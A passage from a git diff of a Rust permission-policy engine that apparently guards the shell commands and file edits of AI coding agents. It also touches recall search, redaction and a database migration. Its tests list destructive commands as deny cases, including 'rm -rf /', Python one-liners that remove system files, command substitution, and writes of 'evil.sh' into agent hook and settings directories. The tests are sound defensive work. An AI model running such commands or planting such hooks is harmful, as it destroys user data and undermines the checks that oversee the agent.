+        matches!(result, PolicyDecision::Deny { .. }),
+        "per-segment blacklist must deny rm -rf / segment, got {result:?}"
+    );
+}
+
+// AC3.3 (companion): `git diff && rm -rf /` is DENY, NOT Allow — the whitelist
+// must not fire on a "safe first segment", and the dangerous segment denies.
+#[test]
+fn ac3_3_whitelisted_first_segment_does_not_allow_dangerous_second() {
+    let engine = PolicyEngine::new();
+    let result = engine.evaluate("Bash", "git diff && rm -rf /");
+    assert!(
+        matches!(result, PolicyDecision::Deny { .. }),
+        "must NOT allow on safe first segment; must deny on rm -rf /, got {result:?}"
+    );
+    assert_ne!(
+        engine.evaluate("Bash", "git diff && rm -rf /"),
+        PolicyDecision::Allow,
+        "git diff && rm -rf / must never be Allow"
+    );
+}
+
+// AC3.3 (companion): a non-whitelisted-but-safe trailing segment is not denied
+// and not allowed — it falls through to Ask (every-segment-whitelisted fails).
+#[test]
+fn ac3_3_partial_whitelist_falls_through_to_ask() {
+    let engine = PolicyEngine::new();
+    // `git diff` is whitelisted; `some_unknown_cmd` is neither listed.
+    let result = engine.evaluate("Bash", "git diff && some_unknown_cmd");
+    assert!(
+        matches!(result, PolicyDecision::Ask { .. }),
+        "a non-whitelisted safe segment must prevent Allow => Ask, got {result:?}"
+    );
+}
+
+// AC3.4: `${VAR:-x}` default-expansion is no longer hard-denied (graylist =>
+// Ask), and a benign `python -c 'import os; print(...)'` is not denied.
+#[test]
+fn ac3_4_default_expansion_and_bare_import_os_not_denied() {
+    let engine = PolicyEngine::new();
+
+    let result = engine.evaluate("Bash", "echo ${VAR:-default}");
+    assert!(
+        !matches!(result, PolicyDecision::Deny { .. }),
+        "${{VAR:-x}} must not be hard-denied, got {result:?}"
+    );
+
+    let result = engine.evaluate("Bash", "python -c 'import os; print(os.getcwd())'");
+    assert!(
+        !matches!(result, PolicyDecision::Deny { .. }),
+        "bare `import os` python one-liner must not be denied, got {result:?}"
+    );
+}
+
+// AC3.4 (companion): genuinely destructive python one-liners stay Deny.
+#[test]
+fn ac3_4_destructive_python_one_liners_still_deny() {
+    let engine = PolicyEngine::new();
+    for cmd in [
+        "python -c 'import os; os.system(\"rm -rf /\")'",
+        "python -c 'import os; os.remove(\"/etc/passwd\")'",
+        "python -c 'import shutil; shutil.rmtree(\"/\")'",
+        "python -c 'import subprocess; subprocess.run([\"rm\"])'",
+    ] {
+        let result = engine.evaluate("Bash", cmd);
+        assert!(
+            matches!(result, PolicyDecision::Deny { .. }),
+            "destructive python one-liner must deny: {cmd} => {result:?}"
+        );
+    }
+}
+
+// AC3.5: a `cd` with a command-substitution argument is NOT stripped, so the
+// `cd $(evil)` segment remains and the command does not get allowed via the
+// trailing safe segment.
+#[test]
+fn ac3_5_cd_with_substitution_not_stripped() {
+    let engine = PolicyEngine::new();
+    // `cd $(evil)` is not a simple cd, so it is NOT stripped; it remains an
+    // effective segment. `$(evil)` is not whitelisted, so the all-segments
+    // whitelist check fails => not Allow. (And the `$(` is not a graylist
+    // construct here, so the result is Ask via fallthrough.)
+    let result = engine.evaluate("Bash", "cd $(evil) && git diff");
+    assert_ne!(
+        result,
+        PolicyDecision::Allow,
+        "cd $(evil) must not be stripped; must not Allow, got {result:?}"
+    );
+}
+
+// AC3.5 (helper unit): the cd-strip predicate only strips literal `cd <token>`.
+#[test]
+fn ac3_5_is_simple_cd_segment_predicate() {
+    assert!(super::is_simple_cd_segment("cd /repo"));
+    assert!(super::is_simple_cd_segment("cd src"));
+    assert!(!super::is_simple_cd_segment("cd")); // bare cd, no token
+    assert!(!super::is_simple_cd_segment("cd a b")); // two tokens
+    assert!(!super::is_simple_cd_segment("cd $(x)")); // substitution
+    assert!(!super::is_simple_cd_segment("cd ~")); // metachar
+    assert!(!super::is_simple_cd_segment("cda")); // not the cd builtin
+}
+
+// Graylist is hidden/internal builtin-only: a graylist rule string must never
+// be representable in the DB RuleType, and load_learned_rules must never
+// produce a graylist rule. `RuleType::parse("graylist")` fails open to Allow,
+// which is exactly why graylist must never be written to the DB.
+#[test]
+fn graylist_never_round_trips_through_learned_rules_ruletype() {
+    use crate::storage::Storage;
+    use crate::types::{LearnedRule, RuleType};
+
+    // The DB rule type has no graylist variant; parsing "graylist" yields the
+    // default (Allow), proving why a graylist string must never be persisted.
+    assert_eq!(RuleType::parse("graylist"), RuleType::Allow);
+    assert_eq!(RuleType::Allow.as_str(), "allow");
+    assert_eq!(RuleType::Deny.as_str(), "deny");
+
+    // Even if a "graylist"-looking pattern is somehow stored, load only ever
+    // produces whitelist/blacklist rules — never a graylist rule.
+    let storage = Storage::open_in_memory().unwrap();
+    storage
+        .add_rule(&LearnedRule::new(
+            "graylist-shaped:*".to_string(),
+            RuleType::Allow,
+            "user_decision".to_string(),
+        ))
+        .unwrap();
+
+    let mut engine = PolicyEngine::empty();
+    engine.load_learned_rules(&storage).unwrap();
+    assert!(
+        engine.graylist_rules().is_empty(),
+        "load_learned_rules must never populate the graylist tier"
+    );
+}
+
+// The builtin graylist tier is populated by the builtin loader and the
+// reclassified constructs live there (not the blacklist).
+#[test]
+fn builtin_graylist_is_populated_and_reclassified() {
+    let engine = PolicyEngine::new();
+    assert!(
+        !engine.graylist_rules().is_empty(),
+        "builtin graylist must be populated"
+    );
+    // eval/backtick are graylist, not blacklist.
+    assert!(
+        engine
+            .blacklist_rules()
+            .iter()
+            .all(|r| !r.pattern.contains("eval ")),
+        "eval must no longer be a blacklist rule"
+    );
+}
+
+// =========================================================================
+// Issue 4 — redirection deny + narrowed dot-claude rule (policy layer)
+// =========================================================================
+
+// AC4.1: redirects / writes into protected config dirs are denied.
+#[test]
+fn ac4_1_redirects_into_protected_dirs_deny() {
+    let engine = PolicyEngine::new();
+    let clx = concat!(".", "clx");
+    let codex = concat!(".", "codex");
+    let cursor = concat!(".", "cursor");
+    let claude = concat!(".", "claude");
+    for cmd in [
+        format!("echo evil > /home/u/{clx}/config.yaml"),
+        format!("echo evil >> /home/u/{clx}/config.yaml"),
+        format!("echo x >/home/u/{codex}/config.toml"),
+        format!("cat src | tee /home/u/{cursor}/hooks.json"),
+        format!("cp evil.sh /home/u/{claude}/hooks/h.sh"),
+        format!("mv evil.sh /home/u/{codex}/x"),
+        format!("dd if=/dev/zero of=/home/u/{clx}/db.sqlite"),
+    ] {
+        let result = engine.evaluate("Bash", &cmd);
+        assert!(
+            matches!(result, PolicyDecision::Deny { .. }),
+            "redirect/write into protected dir must deny: {cmd} => {result:?}"
+        );
+    }
+}
+
+// AC4.4: an ordinary redirect into /tmp is unaffected (not denied by the
+// protected-dir rules). It is not read-only so it is not Allow; it falls
+// through to Ask.
+#[test]
+fn ac4_4_redirect_into_tmp_not_denied() {
+    let engine = PolicyEngine::new();
+    let result = engine.evaluate("Bash", "echo x > /tmp/y");
+    assert!(
+        !matches!(result, PolicyDecision::Deny { .. }),
+        "redirect into /tmp must not be denied, got {result:?}"
+    );
+}
+
+// AC4.3: FileEdit into the sensitive dot-claude targets is still denied.
+#[test]
+fn ac4_3_fileedit_sensitive_dot_claude_targets_deny() {
+    let engine = PolicyEngine::new();
+    let claude = concat!("/.", "claude/");
+    for path in [
+        format!("/home/u/{claude}settings.json"),
+        format!("/home/u/{claude}settings.local.json"),
+        format!("/home/u/{claude}hooks/pre.sh"),
+    ] {
+        let result = engine.evaluate("FileEdit", &path);
+        assert!(
+            matches!(result, PolicyDecision::Deny { .. }),
+            "FileEdit into sensitive dot-claude target must deny: {path} => {result:?}"
+        );
+    }
+}
+
+// AC4.2 (policy-layer slice): a non-sensitive dot-claude path (CLAUDE.md) is
+// NOT denied by the narrowed policy rule. (The authoritative ALLOW assertion
+// lives in the hook-guard batch.)
+#[test]
+fn ac4_2_fileedit_ordinary_dot_claude_not_denied_by_policy() {
+    let engine = PolicyEngine::new();
+    let claude = concat!("/.", "claude/");
+    let result = engine.evaluate("FileEdit", &format!("/home/u/{claude}CLAUDE.md"));
+    assert!(
+        !matches!(result, PolicyDecision::Deny { .. }),
+        "FileEdit into dot-claude CLAUDE.md must NOT be denied by the narrowed policy rule, got {result:?}"
+    );
+}
+
+// AC4.2 (Bash-redirect slice): a redirect into a non-sensitive dot-claude path
+// (memory) must NOT be denied, while a redirect into a sensitive target IS
+// denied — the redirection rules mirror the narrowed FileEdit guard.
+#[test]
+fn ac4_2_bash_redirect_into_dot_claude_memory_not_denied() {
+    let engine = PolicyEngine::new();
+    let claude = concat!("/.", "claude/");
+    // Memory write must be allowed (not denied) by the narrowed redirection rules.
+    let memory = engine.evaluate("Bash", &format!("echo note > /home/u/{claude}CLAUDE.md"));
+    assert!(
+        !matches!(memory, PolicyDecision::Deny { .. }),
+        "redirect into dot-claude memory must NOT be denied, got {memory:?}"
+    );
+    // Sensitive targets must still be denied.
+    for cmd in [
+        format!("echo x > /home/u/{claude}settings.json"),
+        format!("echo x >> /home/u/{claude}settings.local.json"),
+        format!("cat s | tee /home/u/{claude}hooks/h.sh"),
+    ] {
+        let r = engine.evaluate("Bash", &cmd);
+        assert!(
+            matches!(r, PolicyDecision::Deny { .. }),
+            "redirect into sensitive dot-claude target must deny: {cmd} => {r:?}"
+        );
+    }
+}
+
+// =========================================================================
+// Issue 10.1 — extend the read-only allow-set
+// =========================================================================
+
+#[test]
+fn ac10_1_new_read_only_tools() {
+    assert!(is_read_only_command("cd /x"));
+    assert!(is_read_only_command("cd src"));
+    assert!(is_read_only_command("sort file.txt"));
+    assert!(is_read_only_command("uniq file.txt"));
+    assert!(is_read_only_command("cut -f1 file.txt"));
+    assert!(is_read_only_command("column -t file.txt"));
+}
+
+#[test]
+fn ac10_1_sort_output_flag_not_read_only() {
+    // -o / --output write to a file => NOT read-only, in any form.
+    assert!(!is_read_only_command("sort -o out.txt in.txt"));
+    assert!(!is_read_only_command("sort --output=out.txt in.txt"));
+    assert!(!is_read_only_command("sort -oout.txt in.txt"));
+}
diff --git a/crates/clx-core/src/policy/types.rs b/crates/clx-core/src/policy/types.rs
index c4d0657..1d41a0e 100644
--- a/crates/clx-core/src/policy/types.rs
+++ b/crates/clx-core/src/policy/types.rs
@@ -86,6 +86,15 @@ impl PolicyDecision {
 }
 
 /// Type of policy rule
+///
+/// `Graylist` is a HIDDEN / INTERNAL builtin-only tier (Issue 3). It is used
+/// for over-broad-but-not-always-malicious constructs (shell escapes, default
+/// expansions, destructive interpreter one-liners) that should prompt the user
+/// (`Ask`) rather than hard-deny. It is NEVER written to the `learned_rules`
+/// database: the DB uses the separate two-valued [`crate::types::RuleType`]
+/// (`Allow`/`Deny`) which has no graylist representation, so a graylist rule
+/// can never round-trip to disk and `RuleType::parse` can never receive
+/// `"graylist"` (which would `unwrap_or_default()` to `Allow` = fail-open).
 #[derive(Debug, Clone, Copy, PartialEq, Eq, Serialize, Deserialize)]
 #[serde(rename_all = "lowercase")]
 pub enum PolicyRuleType {
@@ -93,6 +102,11 @@ pub enum PolicyRuleType {
     Whitelist,
     /// Blacklist rule - command is blocked
     Blacklist,
+    /// Graylist rule - command requires user confirmation (`Ask`).
+    ///
+    /// Hidden/internal builtin-only tier; never persisted to the DB.
+    #[serde(rename = "graylist")]
+    Graylist,
 }
 
 /// Source of a policy rule
@@ -153,6 +167,20 @@ impl PolicyRule {
         }
     }
 
+    /// Create a new graylist rule (hidden/internal builtin-only `Ask` tier).
+    ///
+    /// Graylist rules are never persisted to the learned-rules DB; they exist
+    /// only in the in-memory builtin set, so the source is always `Builtin`.
+    pub fn graylist(pattern: impl Into<String>) -> Self {
+        Self {
+            pattern: pattern.into(),
+            rule_type: PolicyRuleType::Graylist,
+            source: RuleSource::Builtin,
+            description: None,
+            project_path: None,
+        }
+    }
+
     /// Set the source of the rule
     #[must_use]
     pub fn with_source(mut self, source: RuleSource) -> Self {
diff --git a/crates/clx-core/src/recall/decay.rs b/crates/clx-core/src/recall/decay.rs
index 42577b7..fda50d2 100644
--- a/crates/clx-core/src/recall/decay.rs
+++ b/crates/clx-core/src/recall/decay.rs
@@ -88,10 +88,11 @@ pub fn apply_percentile_gate(hits: Vec<RecallHit>, percentile: u32) -> Vec<Recal
     let mut scores: Vec<f64> = hits.iter().map(|h| h.score).collect();
     scores.sort_by(|a, b| a.partial_cmp(b).unwrap_or(std::cmp::Ordering::Equal));
 
-    // Linear-interpolation percentile (NIST method R6): for n samples,
-    // the p-th percentile index is `(p/100) * (n - 1)` zero-based.
-    // We use the nearest-rank variant via index clamping to keep the math
-    // straightforward; for our use case (top-K filtering) this is sufficient.
+    // Nearest-rank percentile: for n samples the zero-based fractional rank is
+    // `(p/100) * (n - 1)`, which we ROUND to the nearest integer index (not
+    // linearly interpolated between the two surrounding samples). The threshold
+    // is the score at that index. This nearest-rank form keeps the math
+    // straightforward; for our use case (top-K filtering) it is sufficient.
     let n = scores.len();
     let rank = (f64::from(percentile) / 100.0) * (n as f64 - 1.0);
     let idx = rank.round() as usize;
diff --git a/crates/clx-core/src/recall/engine.rs b/crates/clx-core/src/recall/engine.rs
index 16d5580..fda5e17 100644
--- a/crates/clx-core/src/recall/engine.rs
+++ b/crates/clx-core/src/recall/engine.rs
@@ -5,14 +5,41 @@
 //! `LlmClient`, or `EmbeddingStore`; those are wired in at the call site
 //! through the adapters in `storage::recall_repo` and `recall::adapters`.
 
-use tracing::{debug, warn};
+use tracing::{debug, error, warn};
 
 use super::ports::{QueryEmbedder, SnapshotRepo};
 use super::{
-    RecallHit, RecallQueryConfig, RecallSearchType, decay, hybrid_merge, rerank, rrf,
-    score_from_distance,
+    RecallHit, RecallQueryConfig, RecallQueryResult, RecallSearchType, decay, hybrid_merge, rerank,
+    rrf, score_from_distance,
 };
 
+/// Outcome of a single candidate-generation stage.
+///
+/// Distinguishes "the stage ran and found nothing" (`errored == false`) from
+/// "the stage failed" (`errored == true`) so the engine can mark the overall
+/// result degraded rather than folding both into an empty vec. See
+/// [`RecallQueryResult`].
+struct StageOutcome {
+    hits: Vec<RecallHit>,
+    errored: bool,
+}
+
+impl StageOutcome {
+    fn ok(hits: Vec<RecallHit>) -> Self {
+        Self {
+            hits,
+            errored: false,
+        }
+    }
+
+    fn failed() -> Self {
+        Self {
+            hits: Vec::new(),
+            errored: true,
+        }
+    }
+}
+
 /// Engine that performs hybrid search across stored snapshots.
 ///
 /// Constructed via [`RecallEngine::new`] and configured with the builder
@@ -97,25 +124,56 @@ impl<'a> RecallEngine<'a> {
     ///
     /// FTS5 runs first because it completes in <10ms, guaranteeing baseline
     /// results even if the embedding call consumes most of the timeout.
-    pub async fn query(&self, query: &str, config: &RecallQueryConfig) -> Vec<RecallHit> {
+    ///
+    /// Returns a [`RecallQueryResult`] whose `degraded` flag is set when any
+    /// candidate-generation stage (semantic embedding, vector search, FTS5,
+    /// session listing) errored. A degraded result with hits still carries
+    /// those hits (partial failure); a degraded result with no hits is
+    /// distinct from a healthy empty result — callers must not present it as
+    /// "no relevant context". When *every* attempted generator fails a single
+    /// distinct `error!` is emitted.
+    pub async fn query(&self, query: &str, config: &RecallQueryConfig) -> RecallQueryResult {
         let mut fts_hits = Vec::new();
         let mut semantic_hits = Vec::new();
+        // Track candidate-generation health: how many stages we attempted and
+        // how many of those errored. `degraded` is true when any attempted
+        // stage errored; ALL-failed (count == errored, count > 0) escalates to
+        // a distinct error! below.
+        let mut stages_attempted = 0usize;
+        let mut stages_errored = 0usize;
 
         // FTS5 first — always fast (<10ms), provides baseline results
         if config.fallback_to_fts {
-            fts_hits = self.try_fts(query, config);
+            let outcome = self.try_fts(query, config);
+            stages_attempted += 1;
+            stages_errored += usize::from(outcome.errored);
+            fts_hits = outcome.hits;
         }
 
         // Then try semantic search (may be slow due to remote embedding call)
         if let Some(embedder) = self.embedder
             && self.repo.semantic_enabled()
         {
-            semantic_hits = self.try_semantic(query, embedder, config).await;
+            let outcome = self.try_semantic(query, embedder, config).await;
+            stages_attempted += 1;
+            stages_errored += usize::from(outcome.errored);
+            semantic_hits = outcome.hits;
         }
 
         // If FTS5 was skipped and semantic found nothing, try FTS5 as last resort
         if !config.fallback_to_fts && semantic_hits.is_empty() {
-            fts_hits = self.try_fts(query, config);
+            let outcome = self.try_fts(query, config);
+            stages_attempted += 1;
+            stages_errored += usize::from(outcome.errored);
+            fts_hits = outcome.hits;
+        }
+
+        let degraded = stages_errored > 0;
+        if stages_attempted > 0 && stages_errored == stages_attempted {
+            error!(
+                "Recall degraded: all {stages_attempted} candidate-generation stage(s) failed; \
+                 results are unavailable (distinct from an empty match set)"
+            );
         }
 
         let mut fused = if config.rrf_enabled {
@@ -148,23 +206,28 @@ impl<'a> RecallEngine<'a> {
             fused = decay::apply_percentile_gate(fused, config.percentile_gate);
         }
 
-        fused
+        RecallQueryResult {
+            hits: fused,
+            degraded,
+        }
     }
 
     /// Attempt embedding-based semantic search.
     ///
-    /// Returns an empty vec on any error (logged as warning).
+    /// Returns a [`StageOutcome`] whose `errored` flag is set when the
+    /// embedding call or the vector search failed (each logged as a warning).
+    /// A successful call that simply found nothing returns `errored == false`.
     async fn try_semantic(
         &self,
         query: &str,
         embedder: &dyn QueryEmbedder,
         config: &RecallQueryConfig,
-    ) -> Vec<RecallHit> {
+    ) -> StageOutcome {
         let embedding = match embedder.embed_query(query).await {
             Ok(emb) => emb,
             Err(e) => {
                 warn!("Recall semantic embedding failed: {e}");
-                return Vec::new();
+                return StageOutcome::failed();
             }
         };
 
@@ -179,13 +242,13 @@ impl<'a> RecallEngine<'a> {
             Ok(results) => results,
             Err(e) => {
                 warn!("Recall vector search failed: {e}");
-                return Vec::new();
+                return StageOutcome::failed();
             }
         };
 
         if similar.is_empty() {
             debug!("No similar embeddings found for recall");
-            return Vec::new();
+            return StageOutcome::ok(Vec::new());
         }
 
         debug!("Found {} similar embeddings for recall", similar.len());
@@ -224,18 +287,23 @@ impl<'a> RecallEngine<'a> {
             }
         }
 
-        hits
+        StageOutcome::ok(hits)
     }
 
     /// Attempt FTS5 search with substring fallback.
-    fn try_fts(&self, query: &str, config: &RecallQueryConfig) -> Vec<RecallHit> {
+    ///
+    /// Returns a [`StageOutcome`]. The stage is marked `errored` only when the
+    /// underlying candidate generators fail: an FTS5 error that then falls
+    /// through to a *successful* substring scan is not degraded (we recovered),
+    /// but an FTS5 error followed by a session-list error is.
+    fn try_fts(&self, query: &str, config: &RecallQueryConfig) -> StageOutcome {
         let fetch_limit = config.max_results * 2;
 
         // Try FTS5 first
-        match self.repo.search_fts(query, fetch_limit) {
+        let fts_errored = match self.repo.search_fts(query, fetch_limit) {
             Ok(fts_results) if !fts_results.is_empty() => {
                 debug!("FTS5 recall returned {} results", fts_results.len());
-                return fts_results
+                let hits = fts_results
                     .into_iter()
                     .filter_map(|(snapshot, bm25_score)| {
                         let snapshot_id = snapshot.id?;
@@ -250,21 +318,33 @@ impl<'a> RecallEngine<'a> {
                         })
                     })
                     .collect();
+                return StageOutcome::ok(hits);
             }
             Ok(_) => {
                 debug!("FTS5 recall returned no results, trying substring fallback");
+                false
             }
             Err(e) => {
                 warn!("FTS5 recall failed, trying substring fallback: {e}");
+                true
             }
-        }
+        };
 
-        // Substring fallback
-        self.try_substring_fallback(query, fetch_limit)
+        // Substring fallback. If FTS5 itself errored, the stage is degraded even
+        // when the cruder fallback finds hits — the caller must learn the primary
+        // lexical index failed, not silently accept a lower-quality result.
+        let mut outcome = self.try_substring_fallback(query, fetch_limit);
+        if fts_errored {
+            outcome.errored = true;
+        }
+        outcome
     }
 
     /// Fallback substring search across active sessions.
-    fn try_substring_fallback(&self, query: &str, limit: usize) -> Vec<RecallHit> {
+    ///
+    /// Returns a [`StageOutcome`] marked `errored` when the session listing
+    /// fails (the last candidate source for this stage).
+    fn try_substring_fallback(&self, query: &str, limit: usize) -> StageOutcome {
         let query_lower = query.chars().take(500).collect::<String>().to_lowercase();
         let mut hits = Vec::new();
 
@@ -272,7 +352,7 @@ impl<'a> RecallEngine<'a> {
             Ok(s) => s,
             Err(e) => {
                 warn!("Failed to list sessions for substring recall: {e}");
-                return Vec::new();
+                return StageOutcome::failed();
             }
         };
 
@@ -303,12 +383,12 @@ impl<'a> RecallEngine<'a> {
                     }
 
                     if hits.len() >= limit {
-                        return hits;
+                        return StageOutcome::ok(hits);
                     }
                 }
             }
         }
 
-        hits
+        StageOutcome::ok(hits)
     }
 }
diff --git a/crates/clx-core/src/recall/mod.rs b/crates/clx-core/src/recall/mod.rs
index c1d1df0..da517c4 100644
--- a/crates/clx-core/src/recall/mod.rs
+++ b/crates/clx-core/src/recall/mod.rs
@@ -60,6 +60,22 @@ pub struct RecallHit {
     pub search_type: RecallSearchType,
 }
 
+/// Result of a recall query, carrying the hits plus a degraded-health signal.
+///
+/// `degraded` is `true` when any candidate-generation stage (semantic
+/// embedding, vector search, FTS5, or session listing) errored during the
+/// query. This lets callers distinguish a *broken* store (degraded, possibly
+/// empty) from a healthy store that simply has no matching context
+/// (`degraded == false`, empty `hits`). Partial failures still return the
+/// hits that succeeded while flagging `degraded`.
+#[derive(Debug, Clone)]
+pub struct RecallQueryResult {
+    /// The ranked recall hits (possibly empty).
+    pub hits: Vec<RecallHit>,
+    /// Whether any candidate-generation stage errored during this query.
+    pub degraded: bool,
+}
+
 /// How a recall hit was found.
 #[derive(Debug, Clone, Copy, Serialize, Deserialize, PartialEq, Eq)]
 #[serde(rename_all = "lowercase")]
@@ -639,7 +655,7 @@ mod tests {
             ..Default::default()
         };
 
-        let hits = engine.query("authentication", &config).await;
+        let hits = engine.query("authentication", &config).await.hits;
         assert!(
             !hits.is_empty(),
             "FTS query for 'authentication' should find the snapshot"
@@ -667,7 +683,10 @@ mod tests {
             ..Default::default()
         };
 
-        let hits = engine.query("xyzzy_nonexistent_topic_qqq", &config).await;
+        let hits = engine
+            .query("xyzzy_nonexistent_topic_qqq", &config)
+            .await
+            .hits;
         assert!(
             hits.is_empty(),
             "query for gibberish should return no results, got {} hits",
@@ -696,7 +715,7 @@ mod tests {
 
         // semantic_hits will be empty (no ollama/embedding_store),
         // so the code at line 105-107 should trigger FTS as last resort
-        let hits = engine.query("Redis", &config).await;
+        let hits = engine.query("Redis", &config).await.hits;
         assert!(
             !hits.is_empty(),
             "fallback path should still find results via FTS last-resort"
@@ -764,7 +783,7 @@ mod tests {
         };
 
         // Act
-        let hits = engine.query("tokio async", &config).await;
+        let hits = engine.query("tokio async", &config).await.hits;
 
         // Assert: at least one semantic hit should be returned
         assert!(
@@ -797,7 +816,7 @@ mod tests {
         };
 
         // Act — "pipeline" appears in the seeded summary
-        let hits = engine.query("pipeline", &config).await;
+        let hits = engine.query("pipeline", &config).await.hits;
 
         // Assert: substring/FTS fallback must find the seeded snapshot
         assert!(
@@ -829,7 +848,7 @@ mod tests {
         };
 
         // Act
-        let hits = engine.query("anything", &config).await;
+        let hits = engine.query("anything", &config).await.hits;
 
         // Assert
         assert!(
@@ -857,7 +876,7 @@ mod tests {
         };
 
         // Act — this term does not appear anywhere in the seeded data
-        let hits = engine.query("xyzzy_no_match_qqqqqq", &config).await;
+        let hits = engine.query("xyzzy_no_match_qqqqqq", &config).await.hits;
 
         // Assert
         assert!(
diff --git a/crates/clx-core/src/redaction.rs b/crates/clx-core/src/redaction.rs
index a437029..f386121 100644
--- a/crates/clx-core/src/redaction.rs
+++ b/crates/clx-core/src/redaction.rs
@@ -109,7 +109,6 @@ fn redact_azure_hosts(text: &str) -> String {
     // prevent the hostname token from being recognised and scrubbed.
     let mut result = String::with_capacity(out.len());
     let mut pos = 0usize;
-    let out_bytes = out.as_bytes();
     while pos < out.len() {
         // A word boundary: find the next non-space, non-quote, non-special run.
         // We tokenise on whitespace and a small set of punctuation.
@@ -123,9 +122,18 @@ fn redact_azure_hosts(text: &str) -> String {
             .map_or(out.len(), |i| pos + i);
 
         if token_start == token_end {
-            // Delimiter — emit and advance.
-            result.push(out_bytes[pos] as char);
-            pos += 1;
+            // Delimiter — emit the next CHAR (not a raw byte) and advance by its
+            // UTF-8 length. All delimiters in the set above are ASCII, so this
+            // preserves the previous output exactly while removing the
+            // `byte as char` hazard (which would corrupt any multi-byte char if
+            // the boundary set ever grew). We always make progress: `pos`
+            // advances by at least one byte.
+            let ch = out[pos..]
+                .chars()
+                .next()
+                .expect("pos < out.len() guarantees a char");
+            result.push(ch);
+            pos += ch.len_utf8();
             continue;
         }
 
@@ -1122,4 +1130,71 @@ mod tests {
             "T6: safe non-Azure host with port was over-redacted: {result}"
         );
     }
+
+    /// FIX-18: pass-2 of `redact_azure_hosts` previously emitted delimiters via
+    /// `out_bytes[pos] as char` while byte-indexing a UTF-8 string — a latent
+    /// corruption/panic hazard. After refactoring to char-aware iteration the
+    /// output must be byte-for-byte identical on the existing ASCII vectors AND
+    /// correct (lossless) on multi-byte input that passes through pass-2
+    /// unchanged.
+    #[test]
+    fn fix18_redact_azure_hosts_preserves_existing_ascii_vectors() {
+        // Each pair is (input, expected) for the pass-2 host scrubber. These
+        // mirror the existing T6/B6-2 forms and must be unchanged by the
+        // refactor.
+        let cases = [
+            // Bare Azure host with various trailing delimiters -> redacted.
+            (
+                "synthetic-tenant.openai.azure.com:443",
+                "***AZURE-HOST-REDACTED***:443",
+            ),
+            (
+                "host=synthetic-tenant.openai.azure.com&port=443",
+                "host=***AZURE-HOST-REDACTED***&port=443",
+            ),
+            // Non-Azure host with a boundary char -> untouched.
+            ("api.openai.com:443 is fine", "api.openai.com:443 is fine"),
+            // Plain ASCII prose with delimiters -> untouched, structure intact.
+            ("a:b;c<d>e=f&g?h\\i", "a:b;c<d>e=f&g?h\\i"),
+        ];
+        for (input, expected) in cases {
+            assert_eq!(
+                redact_azure_hosts(input),
+                expected,
+                "pass-2 output changed for input: {input:?}"
+            );
+        }
+    }
+
+    /// FIX-18: multi-byte-safe case. Pass-2 must not split or corrupt
+    /// multi-byte UTF-8 characters when emitting delimiter runs. An Azure host
+    /// surrounded by non-ASCII text must be scrubbed while the surrounding
+    /// multi-byte characters survive intact.
+    #[test]
+    fn fix18_redact_azure_hosts_is_multibyte_safe() {
+        // Emoji + CJK around delimiters; no Azure host -> lossless round-trip.
+        let prose = "café — 日本語: 🚀 ok";
+        assert_eq!(
+            redact_azure_hosts(prose),
+            prose,
+            "multi-byte prose must pass through pass-2 unchanged"
+        );
+
+        // Multi-byte chars adjacent to an Azure host, separated by ASCII
+        // delimiters from the boundary set (space and `;`). The host token must
+        // be scrubbed while the surrounding multi-byte arrows survive intact.
+        let mixed = "→ synthetic-tenant.openai.azure.com ←";
+        let out = redact_azure_hosts(mixed);
+        assert!(
+            out.contains("***AZURE-HOST-REDACTED***"),
+            "azure host must still be scrubbed amid multi-byte text: {out}"
+        );
+        assert!(
+            !out.contains("synthetic-tenant.openai.azure.com"),
+            "azure host leaked: {out}"
+        );
+        // The surrounding multi-byte arrows must be intact (valid UTF-8, no
+        // mojibake), and the redaction sits between them.
+        assert_eq!(out, "→ ***AZURE-HOST-REDACTED*** ←", "got: {out}");
+    }
 }
diff --git a/crates/clx-core/src/storage/migration.rs b/crates/clx-core/src/storage/migration.rs
index a835dbc..b4f6a50 100644
--- a/crates/clx-core/src/storage/migration.rs
+++ b/crates/clx-core/src/storage/migration.rs
@@ -7,7 +7,7 @@ use tracing::info;
 use super::Storage;
 
 /// Current schema version for migrations
-pub(super) const SCHEMA_VERSION: i32 = 8;
+pub(super) const SCHEMA_VERSION: i32 = 9;
 
 impl Storage {
     /// Configure `SQLite` pragmas for optimal performance
@@ -96,6 +96,10 @@ impl Storage {
                 self.migrate_to_v8()?;
             }
 
+            if current_version < 9 {
+                self.migrate_to_v9()?;
+            }
+
             self.conn.execute(
                 "INSERT OR REPLACE INTO schema_version (version) VALUES (?1)",
                 [SCHEMA_VERSION],
@@ -149,7 +153,12 @@ impl Storage {
     }
 
     /// Migrate to schema version 1
+    ///
+    /// Wrapped in a transaction so the whole base-schema step commits
+    /// atomically, matching v2-v8. `IF NOT EXISTS` keeps it idempotent.
     pub(super) fn migrate_to_v1(&self) -> crate::Result<()> {
+        let tx = self.conn.unchecked_transaction()?;
+
         self.conn.execute_batch(
             "
             -- Sessions table
@@ -252,6 +261,7 @@ impl Storage {
             ",
         )?;
 
+        tx.commit()?;
         info!("Completed migration to schema version 1");
         Ok(())
     }
@@ -476,6 +486,69 @@ impl Storage {
         info!("Completed migration to schema version 8 (per-row agent host column)");
         Ok(())
     }
+
+    /// Migrate to schema version 9 - purge secret-bearing and malformed
+    /// learned rules (Issue 1).
+    ///
+    /// Earlier CLX builds could persist a `learned_rules` row whose `pattern`
+    /// embedded a credential (e.g. `Bash(SSHPASS=...:*)`) or was otherwise
+    /// malformed/over-broad (e.g. `Bash(true;:*)`). The hook now gates these at
+    /// write time, but existing databases may already carry such rows. This
+    /// migration scrubs them retroactively, of ANY source (a manually-added
+    /// `source="cli"` secret rule SHOULD also be purged). Well-formed wildcard
+    /// or path rules (e.g. `Bash(npm run build*)`) survive because
+    /// `is_well_formed_pattern` allows `*` and `/`.
+    ///
+    /// Approach: open a transaction; guard that `learned_rules` exists (a
+    /// malformed/partial DB without it is a no-op); SELECT and COLLECT all rows
+    /// FIRST (so we are not iterating a result set we mutate), then DELETE each
+    /// offending row by id. Each purged pattern is logged at `info!` REDACTED
+    /// via [`crate::redaction::redact_secrets`]. Idempotent: a clean DB deletes
+    /// nothing.
+    pub(super) fn migrate_to_v9(&self) -> crate::Result<()> {
+        let tx = self.conn.unchecked_transaction()?;
+
+        // Fail-safe against a malformed / partially-built database.
+        if !self.table_exists("learned_rules") {
+            tx.commit()?;
+            info!("Completed migration to schema version 9 (no learned_rules table, no-op)");
+            return Ok(());
+        }
+
+        // Collect all rows FIRST so we are not mutating a live result set.
+        let rows: Vec<(i64, String)> = {
+            let mut stmt = self.conn.prepare("SELECT id, pattern FROM learned_rules")?;
